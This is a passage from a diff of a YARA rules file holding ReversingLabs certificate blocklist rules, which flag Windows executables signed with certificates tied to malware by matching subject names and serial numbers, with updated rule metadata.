-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and ( pe.signatures [ i ] . serial == "00:8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" or pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" ) and 1613088000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" and 1594857600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8Cff807Edaf368A60E4106906D8Df319 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "180f1209-7031-50fb-b1fc-3d357f2b73a1"
+		id = "c964a540-6124-52f0-b17f-692cd4b9b3af"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11744-L11762"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e7a8f3dff77121df53d5f932f861e15208b0607ba77712f40927bc14b17a53cd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4646-L4664"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6fc98519faf218d90bb4e01821e6014e009c0b525cfd3c906a64ef82bc20beda"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15175,21 +39840,21 @@ rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights \\xC3\\x84k\\xC3\\xA4slompolo Oy" and ( pe.signatures [ i ] . serial == "00:98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" or pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" ) and 1640304000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and ( pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" or pe.signatures [ i ] . serial == "8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" ) and 1598334455 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A3E62Be1572293Ad618F58A8Aa32857F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "acd29c6d-27ed-587a-b17c-989e69082434"
+		id = "2f67abf3-390a-5c67-afed-e586e20692af"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11764-L11782"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8c80ed4e4f77df34ff9fcc712deda4c1bbedc588f2b01d02aa705e368fb98c5e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4666-L4684"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f849898465bc651f19f6f1b54315c061466d8c5860ecf1a07f54c8c8292f6a95"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15199,21 +39864,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and ( pe.signatures [ i ] . serial == "00:ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" or pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" ) and 1647388800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISIDA, TOV" and ( pe.signatures [ i ] . serial == "00:a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" or pe.signatures [ i ] . serial == "a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" ) and 1596585600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_672D4428450Afcc24Fc60969A5063A3E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1484a28d-ce7c-506f-8cbb-73ac541a0907"
+		id = "fcd8e808-dbd6-5903-868a-0aa4541e6321"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11784-L11802"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "92f6e90bd21182bece68ac1651105f96a18c5b1497d30e0040a978e349341bdb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4686-L4702"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8f5927e96109184bad7de4513994fd1021fe1cc5977e60fa72d808df95cb4516"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15223,21 +39888,21 @@ rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AATB ApS" and ( pe.signatures [ i ] . serial == "00:84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" or pe.signatures [ i ] . serial == "84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" ) and 1616457600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEP, OOO" and pe.signatures [ i ] . serial == "67:2d:44:28:45:0a:fc:c2:4f:c6:09:69:a5:06:3a:3e" and 1597381260 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Df479E14A70C7970A4De3Dd3E4Bb0318 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eb441b57-0f28-5609-b987-157e1f026b0c"
+		id = "465fc41c-920d-55e6-8616-a51d1f77b158"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11804-L11822"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ec05c7e41e309aff00ae819c63f5bdc8e4172c611779da345efd211e48c9efb1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4704-L4722"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "35b1f04cf5d5d1d89db537bf75737e3af5945e594f4d4231e9ae3e7fba52fc0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15247,21 +39912,21 @@ rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Merkuri LLC" and ( pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) and 1619568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOFTWARE HUB IT LTD" and ( pe.signatures [ i ] . serial == "00:df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" or pe.signatures [ i ] . serial == "df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" ) and 1591660800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2924785Fd7990B2D510675176Dae2Bed : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8a8decfe-c91a-562c-9376-462cab598373"
+		id = "6898e95c-ee31-57a3-b764-99bf9008d0fe"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11824-L11840"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "79db8be7ca3ed80eb1e3a9401e8fec2b83da8b95b16789ed0b59bb7f4639a94d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4724-L4740"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e308ca5f24ed5811e947289caf9aa820a16b08ea183c7aa9826f8a726fb5c3cf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15271,21 +39936,21 @@ rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" and 1605052800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" and 1595000258 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8ec25296-2e51-53ec-a2f5-a25961079c27"
+		id = "3c1bec34-9eac-5c7c-bb36-2e24b6ee52dc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11842-L11860"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "682af8c799acaca531724c5b3184b855e64ec4531fcc333a485ba2f63331cdae"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4742-L4760"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9991f44b8e984bd79269c44999481258d94bec9c21b154b63c6c30ae52344b3c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15295,21 +39960,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) and 1639872000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and ( pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" or pe.signatures [ i ] . serial == "f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" ) and 1598347687 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03Bf9Ef4Cf037A2385649026C3Da9D3E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4cc9c94-eb96-5380-9e12-cab5ec010ab8"
+		id = "d7396af1-2eae-594a-9933-3d148503c0ea"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11862-L11878"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c534ad306f85e12eca2336e998120deb4ba8d0d63b8331986ec7fe4ac69ba65a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4762-L4778"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "14196bad586b1349e6e8a1eb5621ce0d8d346ff8021c8ef80804de1533fd40d9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15319,21 +39984,21 @@ rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO SMART" and pe.signatures [ i ] . serial == "3c:98:b6:87:2f:bb:1f:4a:e3:7a:4c:aa:74:9d:24:c2" and 1613370100 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COLLECTIVE SOFTWARE INC." and pe.signatures [ i ] . serial == "03:bf:9e:f4:cf:03:7a:23:85:64:90:26:c3:da:9d:3e" and 1595371955 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_790177A54209D55560A55Db97C5900D6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9c6d2be7-093c-5ce2-83af-6ab9b46603bc"
+		id = "cc49f477-269a-55af-8344-39d2f24c1e7f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11880-L11898"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ced47bd69b58de9e6b2aa7518ccceca088884acb79c0803c3defe6b115a0abb6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4780-L4796"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "07c8e21fe604b481beebae784eb49e32bebee70e749581a55313bfbc757752e2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15343,21 +40008,21 @@ rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) and 1608508800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAK GmbH" and pe.signatures [ i ] . serial == "79:01:77:a5:42:09:d5:55:60:a5:5d:b9:7c:59:00:d6" and 1594080000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_048F7B5F67D8E2B3030F75Eb7Be2713D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2bce88d4-24e6-59e5-ae02-5284ec43cfa4"
+		id = "e746516a-c51f-5cb8-8157-a5fe1f2c7abe"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11900-L11918"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7cb7d77abefd35f0756c5aa0983f7403cca4cbacd94dcc6b510c929bc96c8309"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4798-L4814"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6d1b47f3c9d7b90a5470f83a848adeebff2cf9341a1eb41ca8b45d08b469b17f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15367,21 +40032,21 @@ rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KULBYT LLC" and ( pe.signatures [ i ] . serial == "00:e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" or pe.signatures [ i ] . serial == "e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" ) and 1614729600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SERVIS, OOO" and pe.signatures [ i ] . serial == "04:8f:7b:5f:67:d8:e2:b3:03:0f:75:eb:7b:e2:71:3d" and 1591142400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_082023879112289Bf351D297Cc8Efcfc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63e2edab-11a4-55ba-b042-c88b6d2750a5"
+		id = "94a4e3d6-2d0a-5e5d-9ae8-574ef9be017e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11920-L11936"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "84402dc0a58fca36424d8d6d13c60b80342bb3792f4e32e23878530264358726"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4816-L4832"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58bec160445765ce45a26bf9d96ba6cfe61eee31e0953009d40a7ec64920c677"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15391,21 +40056,21 @@ rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATER, s.r.o." and pe.signatures [ i ] . serial == "28:c5:7d:f0:9c:e7:cc:3f:de:22:43:be:b4:d0:01:01" and 1622678400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" and 1573430400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0D53690631Dd186C56Be9026Eb931Ae2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5ce5c076-87de-50f0-9fa1-a3efef8dd7f8"
+		id = "4f60613c-4162-5b3d-989f-f79a06450f4d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11938-L11954"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b784e46268d78046365400ef914d7ca673503c93962d0b0740ca2ac9faf7857"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4834-L4850"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3d0a80c062800f935fa3837755e8a91245e01a4e2450a05fecab5564cb62c15c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15415,21 +40080,21 @@ rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" and 1631491200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" and 1592190240 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_32119925A6Ce4710Aecc4006C28E749F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2c4061e8-0b8e-5c33-a746-6557449b17ed"
+		id = "cfd51cb8-bd04-5ede-a73e-e924815a01f0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11956-L11972"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c5f6372a207d02283840e745619e93194d954eedff7bae34aadcb645b1cb78fc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4852-L4868"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ca812cdfbb7ca984fae1e16159eb0eeb1e65767fcc6aa07eeb84966853146f9d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15439,21 +40104,21 @@ rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" and 1602547200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maxiol" and pe.signatures [ i ] . serial == "32:11:99:25:a6:ce:47:10:ae:cc:40:06:c2:8e:74:9f" and 1592438400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2C90Eaf4De3Afc03Ba924C719435C2A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "538d7405-be17-519e-beb5-fbef3beaedd3"
+		id = "06edc1a3-65b1-5a69-ab6b-4ffc3963513c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11974-L11990"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
